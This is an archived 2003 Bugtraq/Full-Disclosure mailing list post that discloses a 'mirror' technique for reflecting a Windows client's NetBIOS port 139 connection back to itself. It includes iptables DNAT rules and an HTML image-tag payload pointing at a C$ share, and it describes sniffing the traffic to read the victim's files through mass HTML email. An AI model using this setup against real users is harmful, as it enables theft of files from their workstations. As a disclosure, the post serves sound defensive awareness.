lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 10 Oct 2003 13:33:51 +0100
From: Joao Gouveia <tharbad@...tik.org>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: "Mirror" attacks on windows clients

Hi all,

Last night I was debguging a netbios connection between two machines and
I remembered of something real simple and "stupid".
I can't recall of reading anything on the subject but fact is i didn't
do any kind of research, so sorry if this is a known issue.

Mirroring Netbios connections from windows clients.

Lacking a better term, I'm calling this "mirror" because the idea is to
put a windows client talking Netbios with him self.

I've prepared a simple iptables based firewall on a linux box, so that
beeing 10.10.10.1 the firewall external interface and 10.10.10.2 the
windows client, this simple rules apply(may wrap):

-A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport
139 -j DNAT --to-destination 10.10.10.2:139
-A POSTROUTING -o eth0 -j MASQUERADE

Basically, what this does (obviously) is "mirror" the connections to
port 139 of the firewall from the windows client to that same port on
the windows client, causing it in fact to be talking Netbios with him
self.

The Netbios connection is established and authenticated successfully,
wich allows me to sniff on the (unencrypted) traffic on the linux box.

So, If the user on the windows workstation visits a web page on my linux
box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini"> he
will in fact be reading his own "boot.ini", and will be able to read it
also by dumping the port 139 traffic on my firewall.

Now, this sonds really simple and "stupid", and of course there's a
strong possibility that I'm looking at this from a totally wrong
perspective, if so I am sorry, but doesn't this look like it allows me
to send a html mail to 10000 windows/outlook users and use this to read
arbitrary files on their workstations ( either by looking at the
traffic, or coding a simple program that parses the netbios traffic)?


Best regards,

Joao Gouveia
------------
tharbad@...tik.org

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ